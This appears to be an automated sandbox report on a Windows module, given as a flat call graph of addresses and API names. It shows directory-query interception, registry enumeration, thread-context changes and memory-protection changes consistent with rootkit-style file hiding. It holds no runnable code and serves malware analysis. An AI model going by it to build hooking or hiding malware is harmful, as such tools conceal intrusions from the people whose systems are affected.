9146->9164 9147->9146 9166 213bdcec318 EnterCriticalSection 9147->9166 9149->9147 9152 213bdcef709 9149->9152 9160 213bdcef6c4 9149->9160 9159 213bdcec870 _invalid_parameter_noinfo 14 API calls 9150->9159 9150->9164 9153 213bdcef880 9151->9153 9168 213bdcec36c LeaveCriticalSection 9151->9168 9154 213bdcecfb4 __free_lconv_mon 13 API calls 9152->9154 9157 213bdcef70e 9154->9157 9158 213bdcece0c _invalid_parameter_noinfo 38 API calls 9157->9158 9158->9160 9161 213bdcef7b3 9159->9161 9163 213bdcec870 _invalid_parameter_noinfo 14 API calls 9161->9163 9162 213bdcef821 9165 213bdcec870 14 API calls _invalid_parameter_noinfo 9162->9165 9163->9164 9164->9162 9167 213bdcec36c LeaveCriticalSection 9164->9167 9165->9162 9169 213bdce242c GetProcessIdOfThread GetCurrentProcessId 9170 213bdce24d2 9169->9170 9171 213bdce2457 CreateFileW 9169->9171 9171->9170 9172 213bdce248b WriteFile ReadFile CloseHandle 9171->9172 9172->9170 8182 213bdceb5aa 8194 213bdcec0b4 8182->8194 8195 213bdcec870 _invalid_parameter_noinfo 14 API calls 8194->8195 8196 213bdcec0bd 8195->8196 8197 213bdce61a3 8198 213bdce61b0 8197->8198 8199 213bdce61bc GetThreadContext 8198->8199 8206 213bdce631a 8198->8206 8200 213bdce61e2 8199->8200 8199->8206 8205 213bdce6209 8200->8205 8200->8206 8201 213bdce6341 VirtualProtect FlushInstructionCache 8201->8206 8202 213bdce63fe 8203 213bdce641e 8202->8203 8215 213bdce48e0 8202->8215 8219 213bdce52f0 GetCurrentProcess 8203->8219 8207 213bdce628d 8205->8207 8209 213bdce6266 SetThreadContext 8205->8209 8206->8201 8206->8202 8209->8207 8210 213bdce6477 8213 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8210->8213 8211 213bdce6437 ResumeThread 8212 213bdce6423 8211->8212 8212->8210 8212->8211 8214 213bdce64bf 8213->8214 8217 213bdce48fc 8215->8217 8216 213bdce495f 8216->8203 8217->8216 8218 213bdce4912 VirtualFree 8217->8218 8218->8217 8220 213bdce530c 8219->8220 8221 213bdce5322 VirtualProtect FlushInstructionCache 8220->8221 8222 213bdce5353 8220->8222 8221->8220 8222->8212 8223 213bdcef1a4 8224 213bdcef1dd 8223->8224 8225 213bdcef1ae 8223->8225 8225->8224 8226 213bdcef1c3 FreeLibrary 8225->8226 8226->8225 8227 213bdcf31a4 8228 213bdcf31bb 8227->8228 8229 213bdcf31b5 CloseHandle 8227->8229 8229->8228 7458 213bdce1bc0 7465 213bdce1724 GetProcessHeap HeapAlloc 7458->7465 7460 213bdce1bd6 SleepEx 7461 213bdce1724 50 API calls 7460->7461 7463 213bdce1bcf 7461->7463 7463->7460 7464 213bdce159c StrCmpIW StrCmpW 7463->7464 7516 213bdce19b0 7463->7516 7464->7463 7533 213bdce1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7465->7533 7467 213bdce174c 7534 213bdce1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7467->7534 7469 213bdce1754 7535 213bdce1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7469->7535 7471 213bdce175d 7536 213bdce1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7471->7536 7473 213bdce1766 7537 213bdce1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7537 7475 213bdce176f 7538 213bdce1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7538 7477 213bdce1778 7539 213bdce1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7539 7479 213bdce1781 7540 213bdce1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7540 7481 213bdce178a RegOpenKeyExW 7482 213bdce19a2 7481->7482 7483 213bdce17bc RegOpenKeyExW 7481->7483 7482->7463 7484 213bdce17fb RegOpenKeyExW 7483->7484 7485 213bdce17e5 7483->7485 7487 213bdce181f 7484->7487 7488 213bdce1836 RegOpenKeyExW 7484->7488 7541 213bdce12b8 RegQueryInfoKeyW 7485->7541 7550 213bdce104c RegQueryInfoKeyW 7487->7550 7491 213bdce1871 RegOpenKeyExW 7488->7491 7492 213bdce185a 7488->7492 7493 213bdce18ac RegOpenKeyExW 7491->7493 7494 213bdce1895 7491->7494 7496 213bdce12b8 16 API calls 7492->7496 7498 213bdce18d0 7493->7498 7499 213bdce18e7 RegOpenKeyExW 7493->7499 7497 213bdce12b8 16 API calls 7494->7497 7500 213bdce1867 RegCloseKey 7496->7500 7501 213bdce18a2 RegCloseKey 7497->7501 7502 213bdce12b8 16 API calls 7498->7502 7503 213bdce1922 RegOpenKeyExW 7499->7503 7504 213bdce190b 7499->7504 7500->7491 7501->7493 7505 213bdce18dd RegCloseKey 7502->7505 7507 213bdce195d RegOpenKeyExW 7503->7507 7508 213bdce1946 7503->7508 7506 213bdce104c 6 API calls 7504->7506 7505->7499 7511 213bdce1918 RegCloseKey 7506->7511 7509 213bdce1981 7507->7509 7510 213bdce1998 RegCloseKey 7507->7510 7512 213bdce104c 6 API calls 7508->7512 7513 213bdce104c 6 API calls 7509->7513 7510->7482 7511->7503 7514 213bdce1953 RegCloseKey 7512->7514 7515 213bdce198e RegCloseKey 7513->7515 7514->7507 7515->7510 7560 213bdce14a0 7516->7560 7533->7467 7534->7469 7535->7471 7536->7473 7537->7475 7538->7477 7539->7479 7540->7481 7542 213bdce1486 RegCloseKey 7541->7542 7543 213bdce1323 GetProcessHeap HeapAlloc 7541->7543 7542->7484 7544 213bdce1472 GetProcessHeap HeapFree 7543->7544 7545 213bdce134e RegEnumValueW 7543->7545 7544->7542 7547 213bdce13a1 7545->7547 7547->7544 7547->7545 7548 213bdce13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7547->7548 7549 213bdce141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7547->7549 7555 213bdce1530 7547->7555 7548->7549 7549->7547 7551 213bdce10bf 7550->7551 7552 213bdce11b5 RegCloseKey 7550->7552 7551->7552 7553 213bdce10cf RegEnumValueW 7551->7553 7554 213bdce114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7551->7554 7552->7488 7553->7551 7554->7551 7556 213bdce154a 7555->7556 7557 213bdce1580 7555->7557 7556->7557 7558 213bdce1561 StrCmpIW 7556->7558 7559 213bdce1569 StrCmpW 7556->7559 7557->7547 7558->7556 7559->7556 7561 213bdce14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7560->7561 7562 213bdce14c2 GetProcessHeap HeapFree 7560->7562 7562->7561 7562->7562 8230 213bdcebf40 8233 213bdcebcf8 8230->8233 8240 213bdcebcc0 8233->8240 8241 213bdcebcd0 8240->8241 8242 213bdcebcd5 8240->8242 8243 213bdcebc7c 13 API calls 8241->8243 8244 213bdcebcdc 8242->8244 8243->8242 8245 213bdcebcf1 8244->8245 8246 213bdcebcec 8244->8246 8248 213bdcebc7c 8245->8248 8247 213bdcebc7c 13 API calls 8246->8247 8247->8245 8249 213bdcebc81 8248->8249 8250 213bdcebcb2 8248->8250 8251 213bdcebcaa 8249->8251 8252 213bdced060 __free_lconv_mon 13 API calls 8249->8252 8253 213bdced060 __free_lconv_mon 13 API calls 8251->8253 8252->8249 8253->8250 8494 213bdceb2c0 8499 213bdcec318 EnterCriticalSection 8494->8499 8629 213bdcf363c 8630 213bdcf3674 __GSHandlerCheckCommon 8629->8630 8631 213bdcf36a0 8630->8631 8633 213bdce97e4 8630->8633 8634 213bdce90e4 __CxxCallCatchBlock 9 API calls 8633->8634 8635 213bdce980e 8634->8635 8636 213bdce90e4 __CxxCallCatchBlock 9 API calls 8635->8636 8637 213bdce981b 8636->8637 8638 213bdce90e4 __CxxCallCatchBlock 9 API calls 8637->8638 8639 213bdce9824 8638->8639 8639->8631 9173 213bdcec9bc 9178 213bdcef160 9173->9178 9175 213bdcec9c5 9176 213bdcec8d0 __free_lconv_mon 13 API calls 9175->9176 9177 213bdcec9e2 __vcrt_uninitialize_ptd 9175->9177 9176->9177 9179 213bdcef175 9178->9179 9180 213bdcef171 9178->9180 9179->9180 9181 213bdceed48 9 API calls 9179->9181 9180->9175 9181->9180 9182 213bdce3fb9 9185 213bdce3f06 _invalid_parameter_noinfo 9182->9185 9183 213bdce3f70 9184 213bdce3f56 VirtualQuery 9184->9183 9184->9185 9185->9183 9185->9184 9186 213bdce3f8a VirtualAlloc 9185->9186 9186->9183 9187 213bdce3fbb GetLastError 9186->9187 9187->9185 9188 213bdce5db9 9189 213bdce5dc0 VirtualProtect 9188->9189 9190 213bdce5de9 GetLastError 9189->9190 9191 213bdce5cd0 9189->9191 9190->9191 8500 213bdce2cb8 8502 213bdce2d15 8500->8502 8501 213bdce2d30 8502->8501 8503 213bdce3678 3 API calls 8502->8503 8503->8501 8504 213bdcf44b5 8505 213bdce90e4 __CxxCallCatchBlock 9 API calls 8504->8505 8506 213bdcf44cd 8505->8506 8507 213bdce90e4 __CxxCallCatchBlock 9 API calls 8506->8507 8508 213bdcf44e8 8507->8508 8509 213bdce90e4 __CxxCallCatchBlock 9 API calls 8508->8509 8510 213bdcf44fc 8509->8510 8511 213bdce90e4 __CxxCallCatchBlock 9 API calls 8510->8511 8512 213bdcf453e 8511->8512 8254 213bdce5734 8255 213bdce573a 8254->8255 8266 213bdce7d60 8255->8266 8259 213bdce579e 8261 213bdce5837 _invalid_parameter_noinfo 8261->8259 8263 213bdce59bd 8261->8263 8279 213bdce7940 8261->8279 8262 213bdce5abb 8263->8262 8264 213bdce5b37 VirtualProtect 8263->8264 8264->8259 8265 213bdce5b63 GetLastError 8264->8265 8265->8259 8267 213bdce7d6b 8266->8267 8268 213bdce577d 8267->8268 8269 213bdceb230 _invalid_parameter_noinfo 2 API calls 8267->8269 8270 213bdce7d8a 8267->8270 8268->8259 8275 213bdce41c0 8268->8275 8269->8267 8271 213bdce7d95 8270->8271 8285 213bdce8578 8270->8285 8289 213bdce8598 8271->8289 8276 213bdce41dd 8275->8276 8278 213bdce424c _invalid_parameter_noinfo 8276->8278 8298 213bdce4430 8276->8298 8278->8261 8280 213bdce7987 8279->8280 8323 213bdce7710 8280->8323 8283 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8284 213bdce79b1 8283->8284 8284->8261 8286 213bdce8586 std::bad_alloc::bad_alloc 8285->8286 8293 213bdce8f38 8286->8293 8288 213bdce8597 8290 213bdce85a6 std::bad_alloc::bad_alloc 8289->8290 8291 213bdce8f38 Concurrency::cancel_current_task 2 API calls 8290->8291 8292 213bdce7d9b 8291->8292 8294 213bdce8f57 8293->8294 8295 213bdce8fa2 RaiseException 8294->8295 8296 213bdce8f80 RtlPcToFileHeader 8294->8296 8295->8288 8297 213bdce8f98 8296->8297 8297->8295 8299 213bdce4477 8298->8299 8300 213bdce4454 8298->8300 8301 213bdce44ad 8299->8301 8318 213bdce4010 8299->8318 8300->8299 8312 213bdce3ee0 8300->8312 8304 213bdce4010 2 API calls 8301->8304 8305 213bdce44dd 8301->8305 8304->8305 8306 213bdce3ee0 3 API calls 8305->8306 8309 213bdce4513 8305->8309 8306->8309 8307 213bdce3ee0 3 API calls 8310 213bdce452f 8307->8310 8308 213bdce4010 2 API calls 8311 213bdce454b 8308->8311 8309->8307 8309->8310 8310->8308 8310->8311 8311->8278 8317 213bdce3f01 _invalid_parameter_noinfo 8312->8317 8313 213bdce3f70 8313->8299 8314 213bdce3f56 VirtualQuery 8314->8313 8314->8317 8315 213bdce3f8a VirtualAlloc 8315->8313 8316 213bdce3fbb GetLastError 8315->8316 8316->8317 8317->8313 8317->8314 8317->8315 8321 213bdce4028 _invalid_parameter_noinfo 8318->8321 8319 213bdce4097 8319->8301 8320 213bdce407d VirtualQuery 8320->8319 8320->8321 8321->8319 8321->8320 8322 213bdce40e2 GetLastError 8321->8322 8322->8321 8324 213bdce772b 8323->8324 8325 213bdce7741 SetLastError 8324->8325 8326 213bdce774f 8324->8326 8325->8326 8326->8283 8640 213bdce2c34 8641 213bdce2c88 8640->8641 8642 213bdce2ca3 8641->8642 8644 213bdce35c4 8641->8644 8645 213bdce365a 8644->8645 8647 213bdce35e9 8644->8647 8645->8642 8646 213bdce3d4c StrCmpNIW 8646->8647 8647->8645 8647->8646 8648 213bdce1e04 StrCmpIW StrCmpW 8647->8648 8648->8647 9192 213bdcf43d1 __scrt_dllmain_exception_filter 8513 213bdcec2d0 8514 213bdcec2d8 8513->8514 8515 213bdcec305 8514->8515 8517 213bdcec334 8514->8517 8518 213bdcec35f 8517->8518 8519 213bdcec342 DeleteCriticalSection 8518->8519 8520 213bdcec363 8518->8520 8519->8518 8520->8515 9193 213bdce2dd0 9194 213bdce2e41 9193->9194 9195 213bdce3154 9194->9195 9196 213bdce2e6d GetModuleHandleA 9194->9196 9197 213bdce2e91 9196->9197 9198 213bdce2e7f GetProcAddress 9196->9198 9197->9195 9199 213bdce2eb8 StrCmpNIW 9197->9199 9198->9197 9199->9195 9203 213bdce2edd 9199->9203 9200 213bdce1a30 6 API calls 9200->9203 9201 213bdce2fef lstrlenW 9201->9203 9202 213bdce3099 lstrlenW 9202->9203 9203->9195 9203->9200 9203->9201 9203->9202 9204 213bdce3d4c StrCmpNIW 9203->9204 9205 213bdce1cf8 StrCmpIW StrCmpW 9203->9205 9204->9203 9205->9203 8649 213bdce5a4d 8651 213bdce5a54 8649->8651 8650 213bdce5abb 8651->8650 8652 213bdce5b37 VirtualProtect 8651->8652 8653 213bdce5b63 GetLastError 8652->8653 8654 213bdce5b71 8652->8654 8653->8654 8521 213bdce8ccc 8528 213bdce922c 8521->8528 8526 213bdce8cd9 8529 213bdce9234 8528->8529 8531 213bdce9265 8529->8531 8532 213bdce8cd5 8529->8532 8545 213bdce9ae8 8529->8545 8533 213bdce9274 __vcrt_uninitialize_locks DeleteCriticalSection 8531->8533 8532->8526 8534 213bdce91c0 8532->8534 8533->8532 8550 213bdce99bc 8534->8550 8546 213bdce986c __vcrt_InitializeCriticalSectionEx 5 API calls 8545->8546 8547 213bdce9b1e 8546->8547 8548 213bdce9b33 InitializeCriticalSectionAndSpinCount 8547->8548 8549 213bdce9b28 8547->8549 8548->8549 8549->8529 8551 213bdce986c __vcrt_InitializeCriticalSectionEx 5 API calls 8550->8551 8552 213bdce99e1 TlsAlloc 8551->8552 9206 213bdce7fcc 9213 213bdce8cf4 9206->9213 9209 213bdce7fd9 9214 213bdce9100 __CxxCallCatchBlock 9 API calls 9213->9214 9215 213bdce7fd5 9214->9215 9215->9209 9216 213bdcec048 9215->9216 9217 213bdcec8d0 __free_lconv_mon 13 API calls 9216->9217 9218 213bdce7fe2 9217->9218 9218->9209 9219 213bdce8d08 9218->9219 9222 213bdce909c 9219->9222 9221 213bdce8d11 9221->9209 9223 213bdce90ad 9222->9223 9224 213bdce90c2 9222->9224 9225 213bdce9a4c __CxxCallCatchBlock 6 API calls 9223->9225 9224->9221 9226 213bdce90b2 9225->9226 9228 213bdce9a94 9226->9228 9229 213bdce986c __vcrt_InitializeCriticalSectionEx 5 API calls 9228->9229 9230 213bdce9ac2 9229->9230 9231 213bdce9acc 9230->9231 9232 213bdce9ad4 TlsSetValue 9230->9232 9231->9224 9232->9231 9233 213bdcefbe0 9234 213bdcefc0a 9233->9234 9235 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 9234->9235 9236 213bdcefc2a 9235->9236 9237 213bdced060 __free_lconv_mon 13 API calls 9236->9237 9238 213bdcefc38 9237->9238 9239 213bdcefc62 9238->9239 9241 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 9238->9241 9240 213bdcefc81 InitializeCriticalSectionEx 9239->9240 9243 213bdcefc6b 9239->9243 9240->9239 9242 213bdcefc54 9241->9242 9244 213bdced060 __free_lconv_mon 13 API calls 9242->9244 9244->9239 9245 213bdcef5e0 9248 213bdcef598 9245->9248 9253 213bdcec318 EnterCriticalSection 9248->9253 8554 213bdce40e0 8556 213bdce402d _invalid_parameter_noinfo 8554->8556 8555 213bdce407d VirtualQuery 8555->8556 8558 213bdce4097 8555->8558 8556->8555 8557 213bdce40e2 GetLastError 8556->8557 8556->8558 8557->8556 8336 213bdcf455d 8339 213bdceacf4 8336->8339 8340 213bdcead0e 8339->8340 8342 213bdcead5b 8339->8342 8341 213bdce90e4 __CxxCallCatchBlock 9 API calls 8340->8341 8340->8342 8341->8342 9254 213bdcebfd8 9255 213bdced060 __free_lconv_mon 13 API calls 9254->9255 9256 213bdcebfe8 9255->9256 9257 213bdced060 __free_lconv_mon 13 API calls 9256->9257 9258 213bdcebffc 9257->9258 9259 213bdced060 __free_lconv_mon 13 API calls 9258->9259 9260 213bdcec010 9259->9260 9261 213bdced060 __free_lconv_mon 13 API calls 9260->9261 9262 213bdcec024 9261->9262 7593 213bdce27d4 NtQueryDirectoryFileEx 7594 213bdce285e _invalid_parameter_noinfo 7593->7594 7606 213bdce2984 7593->7606 7595 213bdce28b5 GetFileType 7594->7595 7594->7606 7596 213bdce28d9 7595->7596 7597 213bdce28c3 StrCpyW 7595->7597 7609 213bdce1ad0 GetFinalPathNameByHandleW 7596->7609 7598 213bdce28e8 7597->7598 7602 213bdce2989 7598->7602 7607 213bdce28f2 7598->7607 7600 213bdce3d4c StrCmpNIW 7600->7602 7602->7600 7603 213bdce34d8 4 API calls 7602->7603 7604 213bdce1dd0 2 API calls 7602->7604 7602->7606 7603->7602 7604->7602 7607->7606 7614 213bdce3d4c 7607->7614 7617 213bdce34d8 StrCmpIW 7607->7617 7621 213bdce1dd0 7607->7621 7610 213bdce1b39 7609->7610 7611 213bdce1afa StrCmpNIW 7609->7611 7610->7598 7611->7610 7612 213bdce1b14 lstrlenW 7611->7612 7612->7610 7613 213bdce1b26 StrCpyW 7612->7613 7613->7610 7615 213bdce3d6e 7614->7615 7616 213bdce3d59 StrCmpNIW 7614->7616 7615->7607 7616->7615 7618 213bdce3521 PathCombineW 7617->7618 7619 213bdce350a StrCpyW StrCatW 7617->7619 7620 213bdce352a 7618->7620 7619->7620 7620->7607 7622 213bdce1de7 7621->7622 7624 213bdce1df0 7621->7624 7623 213bdce1530 2 API calls 7622->7623 7623->7624 7624->7607 9263 213bdcee9f0 GetCommandLineA GetCommandLineW 8559 213bdce24f0 8561 213bdce257b _invalid_parameter_noinfo 8559->8561 8560 213bdce26ab 8561->8560 8562 213bdce25dd GetFileType 8561->8562 8563 213bdce2601 8562->8563 8564 213bdce25eb StrCpyW 8562->8564 8566 213bdce1ad0 4 API calls 8563->8566 8565 213bdce2610 8564->8565 8569 213bdce26b0 8565->8569 8571 213bdce2619 8565->8571 8566->8565 8567 213bdce3d4c StrCmpNIW 8567->8569 8568 213bdce3d4c StrCmpNIW 8568->8571 8569->8560 8569->8567 8570 213bdce34d8 4 API calls 8569->8570 8572 213bdce1dd0 2 API calls 8569->8572 8570->8569 8571->8560 8571->8568 8573 213bdce34d8 4 API calls 8571->8573 8574 213bdce1dd0 2 API calls 8571->8574 8572->8569 8573->8571 8574->8571 9264 213bdce61f0 9265 213bdce61fd 9264->9265 9266 213bdce6209 9265->9266 9271 213bdce631a 9265->9271 9267 213bdce628d 9266->9267 9268 213bdce6266 SetThreadContext 9266->9268 9268->9267 9269 213bdce6341 VirtualProtect FlushInstructionCache 9269->9271 9270 213bdce63fe 9272 213bdce641e 9270->9272 9274 213bdce48e0 VirtualFree 9270->9274 9271->9269 9271->9270 9273 213bdce52f0 3 API calls 9272->9273 9277 213bdce6423 9273->9277 9274->9272 9275 213bdce6477 9278 213bdce7e30 _invalid_parameter_noinfo 8 API calls 9275->9278 9276 213bdce6437 ResumeThread 9276->9277 9277->9275 9277->9276 9279 213bdce64bf 9278->9279 8575 213bdce84ec 8578 213bdce8e80 8575->8578 8577 213bdce8515 8579 213bdce8ea1 8578->8579 8581 213bdce8ed6 8578->8581 8580 213bdcec0e8 __std_exception_copy 38 API calls 8579->8580 8579->8581 8580->8581 8581->8577 8678 213bdcea86c 8679 213bdcea899 __except_validate_context_record 8678->8679 8680 213bdce90e4 __CxxCallCatchBlock 9 API calls 8679->8680 8681 213bdcea89e 8680->8681 8683 213bdcea8f8 8681->8683 8685 213bdcea986 8681->8685 8692 213bdcea94c 8681->8692 8682 213bdcea9f4 8682->8692 8720 213bdce9fec 8682->8720 8684 213bdcea973 8683->8684 8683->8692 8693 213bdcea91a __GetCurrentState 8683->8693 8707 213bdce9390 8684->8707 8689 213bdcea9a5 8685->8689 8714 213bdce978c 8685->8714 8689->8682 8689->8692 8717 213bdce97a0 8689->8717 8691 213bdceaa9d 8693->8691 8695 213bdcead78 8693->8695 8696 213bdce978c Is_bad_exception_allowed 9 API calls 8695->8696 8697 213bdceada7 __GetCurrentState 8696->8697 8698 213bdce90e4 __CxxCallCatchBlock 9 API calls 8697->8698 8705 213bdceadc4 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8698->8705 8699 213bdceaebb 8700 213bdce90e4 __CxxCallCatchBlock 9 API calls 8699->8700 8701 213bdceaec0 8700->8701 8702 213bdce90e4 __CxxCallCatchBlock 9 API calls 8701->8702 8703 213bdceaecb __FrameHandler3::GetHandlerSearchState 8701->8703 8702->8703 8703->8692 8704 213bdce978c 9 API calls Is_bad_exception_allowed 8704->8705 8705->8699 8705->8703 8705->8704 8706 213bdce97b4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8705->8706 8706->8705 8777 213bdce93f4 8707->8777 8709 213bdce93af __FrameHandler3::ExecutionInCatch 8781 213bdce9300 8709->8781 8712 213bdcead78 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8713 213bdce93e4 8712->8713 8713->8692 8715 213bdce90e4 __CxxCallCatchBlock 9 API calls 8714->8715 8716 213bdce9795 8715->8716 8716->8689 8718 213bdce90e4 __CxxCallCatchBlock 9 API calls 8717->8718 8719 213bdce97a9 8718->8719 8719->8682 8785 213bdceaf04 8720->8785 8722 213bdcea4b4 8723 213bdcea405 8723->8722 8763 213bdcea403 8723->8763 8838 213bdcea4bc 8723->8838 8724 213bdcea133 8724->8723 8768 213bdcea16b 8724->8768 8726 213bdce90e4 __CxxCallCatchBlock 9 API calls 8730 213bdcea447 8726->8730 8727 213bdcea335 8734 213bdce978c Is_bad_exception_allowed 9 API calls 8727->8734 8735 213bdcea352 8727->8735 8727->8763 8728 213bdce90e4 __CxxCallCatchBlock 9 API calls 8731 213bdcea09a 8728->8731 8730->8722 8732 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8730->8732 8731->8730 8736 213bdce90e4 __CxxCallCatchBlock 9 API calls 8731->8736 8733 213bdcea45a 8732->8733 8733->8692 8734->8735 8739 213bdcea374 8735->8739 8735->8763 8831 213bdce9364 8735->8831 8738 213bdcea0aa 8736->8738 8740 213bdce90e4 __CxxCallCatchBlock 9 API calls 8738->8740 8741 213bdcea38a 8739->8741 8742 213bdcea497 8739->8742 8739->8763 8743 213bdcea0b3 8740->8743 8744 213bdcea395 8741->8744 8747 213bdce978c Is_bad_exception_allowed 9 API calls 8741->8747 8745 213bdce90e4 __CxxCallCatchBlock 9 API calls 8742->8745 8796 213bdce97cc 8743->8796 8750 213bdceaf9c 9 API calls 8744->8750 8748 213bdcea49d 8745->8748 8747->8744 8751 213bdce90e4 __CxxCallCatchBlock 9 API calls 8748->8751 8752 213bdcea3ab 8750->8752 8754 213bdcea4a6 8751->8754 8757 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8752->8757 8752->8763 8753 213bdce90e4 __CxxCallCatchBlock 9 API calls 8756 213bdcea0f5 8753->8756 8755 213bdcec0b4 14 API calls 8754->8755 8755->8722 8756->8724 8759 213bdce90e4 __CxxCallCatchBlock 9 API calls 8756->8759 8758 213bdcea3c5 8757->8758 8835 213bdce95f8 RtlUnwindEx 8758->8835 8762 213bdcea101 8759->8762 8760 213bdce97a0 9 API calls 8760->8768 8764 213bdce90e4 __CxxCallCatchBlock 9 API calls 8762->8764 8763->8726 8766 213bdcea10a 8764->8766 8799 213bdceaf9c 8766->8799 8768->8727 8768->8760 8810 213bdcea72c 8768->8810 8824 213bdce9f18 8768->8824 8771 213bdcea11e 8806 213bdceb08c 8771->8806 8773 213bdcea491 8774 213bdcec0b4 14 API calls 8773->8774 8774->8742 8775 213bdcea126 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8775->8773 8776 213bdce8f38 Concurrency::cancel_current_task 2 API calls 8775->8776 8776->8773 8778 213bdce9422 __FrameHandler3::ExecutionInCatch 8777->8778 8779 213bdce944c RtlLookupFunctionEntry 8778->8779 8780 213bdce9494 8778->8780 8779->8778 8780->8709 8782 213bdce9320 8781->8782 8783 213bdce934b 8781->8783 8782->8783 8784 213bdce90e4 __CxxCallCatchBlock 9 API calls 8782->8784 8783->8712 8784->8782 8786 213bdceaf29 __FrameHandler3::ExecutionInCatch 8785->8786 8787 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8786->8787 8788 213bdceaf3e 8787->8788 8850 213bdce9b74 8788->8850 8791 213bdceaf50 __FrameHandler3::GetHandlerSearchState 8853 213bdce9bac 8791->8853 8792 213bdceaf73 8793 213bdce9b74 __GetUnwindTryBlock RtlLookupFunctionEntry 8792->8793 8794 213bdcea04e 8793->8794 8794->8722 8794->8724 8794->8728 8797 213bdce90e4 __CxxCallCatchBlock 9 API calls 8796->8797 8798 213bdce97da 8797->8798 8798->8722 8798->8753 8800 213bdceb083 8799->8800 8802 213bdceafc7 8799->8802 8801 213bdcea11a 8801->8724 8801->8771 8802->8801 8803 213bdce97a0 9 API calls 8802->8803 8804 213bdce978c Is_bad_exception_allowed 9 API calls 8802->8804 8805 213bdcea72c 9 API calls 8802->8805 8803->8802 8804->8802 8805->8802 8807 213bdceb0f9 8806->8807 8809 213bdceb0a9 Is_bad_exception_allowed 8806->8809 8807->8775 8808 213bdce978c 9 API calls Is_bad_exception_allowed 8808->8809 8809->8807 8809->8808 8811 213bdcea759 8810->8811 8823 213bdcea7e8 8810->8823 8812 213bdce978c Is_bad_exception_allowed 9 API calls 8811->8812 8813 213bdcea762 8812->8813 8814 213bdce978c Is_bad_exception_allowed 9 API calls 8813->8814 8815 213bdcea77b 8813->8815 8813->8823 8814->8815 8816 213bdcea7a7 8815->8816 8817 213bdce978c Is_bad_exception_allowed 9 API calls 8815->8817 8815->8823 8818 213bdce97a0 9 API calls 8816->8818 8817->8816 8819 213bdcea7bb 8818->8819 8820 213bdce978c Is_bad_exception_allowed 9 API calls 8819->8820 8821 213bdcea7d4 8819->8821 8819->8823 8820->8821 8822 213bdce97a0 9 API calls 8821->8822 8822->8823 8823->8768 8825 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8824->8825 8826 213bdce9f55 8825->8826 8827 213bdce978c Is_bad_exception_allowed 9 API calls 8826->8827 8828 213bdce9f8d 8827->8828 8829 213bdce95f8 9 API calls 8828->8829 8830 213bdce9fd1 8829->8830 8830->8768 8832 213bdce9378 __FrameHandler3::ExecutionInCatch 8831->8832 8833 213bdce9300 __FrameHandler3::ExecutionInCatch 9 API calls 8832->8833 8834 213bdce9382 8833->8834 8834->8739 8836 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8835->8836 8837 213bdce96f2 8836->8837 8837->8763 8839 213bdcea708 8838->8839 8840 213bdcea4f5 8838->8840 8839->8763 8841 213bdce90e4 __CxxCallCatchBlock 9 API calls 8840->8841 8842 213bdcea4fa 8841->8842 8843 213bdcea519 EncodePointer 8842->8843 8849 213bdcea56c 8842->8849 8844 213bdce90e4 __CxxCallCatchBlock 9 API calls 8843->8844 8845 213bdcea529 8844->8845 8845->8849 8856 213bdce92ac 8845->8856 8847 213bdce978c 9 API calls Is_bad_exception_allowed 8847->8849 8848 213bdce9f18 19 API calls 8848->8849 8849->8839 8849->8847 8849->8848 8851 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8850->8851 8852 213bdce9b87 8851->8852 8852->8791 8852->8792 8854 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8853->8854 8855 213bdce9bc6 8854->8855 8855->8794 8857 213bdce90e4 __CxxCallCatchBlock 9 API calls 8856->8857 8858 213bdce92d8 8857->8858 8858->8849 8347 213bdcf0d68 8348 213bdcf0d8c 8347->8348 8349 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8348->8349 8350 213bdcf0dce 8349->8350 9280 213bdcec5e8 9281 213bdcec5ed 9280->9281 9282 213bdcec602 9280->9282 9286 213bdcec608 9281->9286 9287 213bdcec64a 9286->9287 9288 213bdcec652 9286->9288 9289 213bdced060 __free_lconv_mon 13 API calls 9287->9289 9290 213bdced060 __free_lconv_mon 13 API calls 9288->9290 9289->9288 9291 213bdcec65f 9290->9291 9292 213bdced060 __free_lconv_mon 13 API calls 9291->9292 9293 213bdcec66c 9292->9293 9294 213bdced060 __free_lconv_mon 13 API calls 9293->9294 9295 213bdcec679 9294->9295 9296 213bdced060 __free_lconv_mon 13 API calls 9295->9296 9297 213bdcec686 9296->9297 9298 213bdced060 __free_lconv_mon 13 API calls 9297->9298 9299 213bdcec693 9298->9299 9300 213bdced060 __free_lconv_mon 13 API calls 9299->9300 9301 213bdcec6a0 9300->9301 9302 213bdced060 __free_lconv_mon 13 API calls 9301->9302 9303 213bdcec6ad 9302->9303 9304 213bdced060 __free_lconv_mon 13 API calls 9303->9304 9305 213bdcec6bd 9304->9305 9306 213bdced060 __free_lconv_mon 13 API calls 9305->9306 9307 213bdcec6cd 9306->9307 9312 213bdcec4b8 9307->9312 9326 213bdcec318 EnterCriticalSection 9312->9326

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00000213BDCE27D4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185filenativeCOMMON
